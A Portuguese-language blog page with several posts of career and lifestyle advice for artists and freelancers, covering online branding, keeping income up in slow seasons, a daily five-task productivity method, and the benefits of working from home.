Engana-se quem pensa que todo artista é um ser sem rumo, que vive vendendo sua arte na praia e mora como hippie pelas ruas das cidades. É claro que se ele quiser viver assim, ele também tem esse direito, assim como qualquer pessoa no mundo. Porém, é bem comum associarmos a figura do artista com esteriótipos prontos e cheios de clichês como este, veja mais alguns exemplos aqui.

Nos últimos tempos, o mundo vem vivendo mudanças significativas nos seus mais diversos âmbitos. A internet é a mais nova poderosa ferramenta na disseminação de novos conteúdos. Consequentemente, a maneira como vemos e encaramos a arte também. Agora, com apenas um clique, podemos ter novos conteúdos visuais a nosso dispor, além do que, divulgar um novo trabalho, ficou muito mais fácil.

Kai Oberhäuser

Para o artista visual, essa nova realidade inclui também uma série de mudanças. Estar em sintonia com essas novas ferramentas digitais, inclui atualização constante e trabalho, muito trabalho. É claro que sempre há a opção de você permanecer somente no offline, mas, cá entre nós, sabemos que essa realidade é cada vez mais escassa.

Ser uma pessoa que produz trabalhos artísticos e tem a sua própria marca, requer acima de tudo seriedade e dedicação naquilo que você faz. Saber divulgar e apresentar isso ao mundo, requer um mínimo conhecimento sobre marketing e empreendedorismo criativo/digital. Se você deseja ter retorno financeiro razoável e impacto social e cultural com a sua arte, precisa realmente levar a sério o que você faz, e acima de tudo, não ter medo de mostrar isso ao mundo. Seja um artista atualizado e esteja consciente sobre a importância de sua marca no mundo!

Como alavancar os negócios nos meses mais difíceis?

Se você trabalha com a venda de produtos ou serviços, deve haver uma época do ano em que as vendas caem. Por morar em uma região onde o inverno tende a ser rigoroso, a procura pelos meus serviços, nessa época, são menores. (Para quem não sabe, eu trabalho com fotografias). E, posso afirmar que as pessoas não gostam muito de serem fotografadas ao ar livre ou então se casar, durante a época de frio.

Mas então, o que fazer nessa época do ano para conseguir um faturamento satisfatório? Abaixo, algumas soluções que utilizo no meu negócio e que, talvez sejam úteis para o seu!

VENDER NOVOS SERVIÇOS/PRODUTOS PARA CLIENTES ANTIGOS: Ao invés de somente prospectar clientes novos, que tal fidelizar os antigos? Entre em contato com todos aqueles que já compraram algo de você. Ofereça novos produtos, pergunte quais são suas necessidades!

Foto: Brook Lark

APROVEITAR A BAIXA DEMANDA DE TRABALHO PARA DESENVOLVER UM PROJETO PESSOAL: Com menos trabalho em vista, provavelmente você terá mais tempo disponível. Que tal canalizar a sua criatividade para desenvolver algum projeto pessoal? Assim, você ocupará sua mente com algo bacana e ainda poderá criar maneiras de monetizar o resultado do seu projeto.

PARCERIAS: Aproveite o tempo livre e faça parcerias. Beneficie-se e beneficie também o próximo. Planeje, crie e desenvolva projetos com parceiros que ajudarão a divulgar seu trabalho. Parcerias SEMPRE trazem benefícios! Plante as suas sementes e você as colherá mais adiante.

Foto: Rachel Gorjestani

E claro, lembre-se sempre de se planejar financeiramente com antecedência para os meses de queda nos negócios. Ninguém gosta de passar por “perrengues” por descuido, né?

Como Ser Mais Organizada e Produtiva?

Correria e estresse não faltam no nosso dia-a-dia. E aquele sentimento de improdutividade? De que o dia passou voando e não rendeu nada, NADINHA? Pelo menos a mim, esse sentimento incomoda muito. E, por causa dele, aprendi uma técnica que vem me auxiliando a ser mais produtiva e a me organizar melhor.

Primeiro, é necessário fazer uma lista maior. Nela, se coloca todas as tarefas que você precisa realizar. Desde a mais simples até a mais complexa, que levará meses para finalizar. Eu, por exemplo, tenho uma lista par cada um dos projetos em que trabalho, ou seja, três listas. Nelas coloco tarefas simples, como enviar uma proposta de orçamento a um cliente, por exemplo, até tarefas mais complexas, como conseguir fechar 10 trabalhos nos 3 próximos meses.

Jeff Sheldon

O segundo passo é mais simples: Ter uma agenda onde, diariamente, anoto 5 tarefas (das que estão na lista maior) a serem completadas. PRECISO realizar essas 5 tarefas no dia. Portanto, sempre tento equilibrar duas mais complexas com três mais simples, para que eu consiga finalizar tudo. Você pode levar duas horas ou oito para realizá-las, mas o importante é que você conseguirá eliminar 5 tarefas por dia. Dessa forma, você consegue ter um controle maior de seu andamento.

Thought Catalog

Outra dica bem importante é ir riscando cada tarefa concluída. O sentimento de “eliminar” a tarefa da lista, é muito bom! E eu sempre prefiro iniciar as tarefas mais complexas ou urgentes, primeiro. Pois acredito que pela manhã sou mais produtiva e no decorrer da tarde vai batendo aquela “preguicinha”. Mas, claro, isso varia de pessoa para pessoa.

E você, como costuma gerir seu tempo e planejar as suas tarefas? Conte pra gente nos comentários!

 

A Rotina de Viver sem Rotina

Mais uma segunda-feira que chega: você acorda, vai para o escritório, bate o ponto e fica por lá até às 18h. Os seus chefes não estão preocupados se você está inspirado para trabalhar. Eles apenas querem que você produza (com vontade ou sem). Essa é a rotina de 90% das pessoas que eu conheço. Mas, por ser a maior porcentagem, significa que ela está certa? Óbvio que não.

É comum para quem possui profissões criativas ou para quem trabalha em home office, sofrer preconceito por não seguir estes padrões. Eu, particularmente, já me senti inferior muitas vezes por não precisar obrigatoriamente acordar cedo e sair para trabalhar. (Porque poder dormir segunda-feira de manhã e trabalhar apenas à tarde é coisa de “gente preguiçosa”, né?!) E, conversando com mais pessoas de diversos ramos, descobri que MUITAS pessoas se sentem assim também!

Foto por: Mihai Surdo

Então, se você é autônomo, trabalha em seu home office ou então possui uma profissão que depende da sua criatividade, vou listar aqui alguns motivos para você se sentir muito orgulhoso e satisfeito por isso:

  1. Você cria o seu horário de trabalho: Se você produz melhor pela manhã, não há nada de errado em acordar cedo. Porém, se você é mais criativo na parte da noite, por que não trabalhar das 16h às 00h?
  2. Não precisa se arrumar para trabalhar: Trabalhar o dia todo usando pijama. Tem coisa melhor? Sem salto alto, sem maquiagem… não preciso enfatizar o quanto isso é bom, né?
  3. Poder passear em horários improváveis: Fazer as compras do mês em uma terça às 10h da manhã. Ou então, passear no shopping durante a tarde. Além de sentir a maravilhosa sensação de liberdade, você ainda aproveita todos os lugares sem perder tempo em filas.
  4. Não precisa enfrentar trânsito: Engarrafamentos, trens lotados e a possibilidade de não chegar a tempo, simplesmente não existem quando se trabalha em casa.
  5. Liberdade: Você pode ouvir sua música favorita sem precisar de fones de ouvido! E o melhor: pode cantar junto sem parecer uma doida!

    Foto por: Jaroslaw Ceborski
  6. Não precisa lidar com chefes e colegas chatos: Todo mundo tem (ou já teve) um chefe ou colega de trabalho chatos.  O bom é que, trabalhando em casa, você não precisa lidar com nenhuma das duas opções 🙂
  7. Trabalhar com menos pressão e cobranças: Você pode trabalhar no seu ritmo, com os seus próprios prazos.
  8. Pausas: Você pode fazer pausas a hora que desejar. Seja para fazer um lanche, assistir a um filminho ou cochilar depois do amoço. Mas, claro, lembre-se de compensar esse tempo, mais tarde.
  9. Reservar um tempinho para se inspirar: Ao menos uma hora por semana, reserve um tempo para meditar, planejar seu futuro e criar metas. Outra maneira de se inspirar é assistir filmes, ouvir música ou conhecer algum lugar novo na cidade.
  10. Economia: Ao trabalhar em casa, você não precisa gastar com transporte, almoços em restaurantes, roupas de trabalho, aluguel, etc.

Mas, lembre-se: Trabalho é trabalho. Por isso, precisa de muita dedicação e compromisso. Não é por estar trabalhando em um ambiente confortável, que você está “de férias”. Nada de ficar dormindo e deixar o trabalho para amanhã, viu?! Com metas bem definidas, força de vontade e persistência, você chegará onde deseja 😉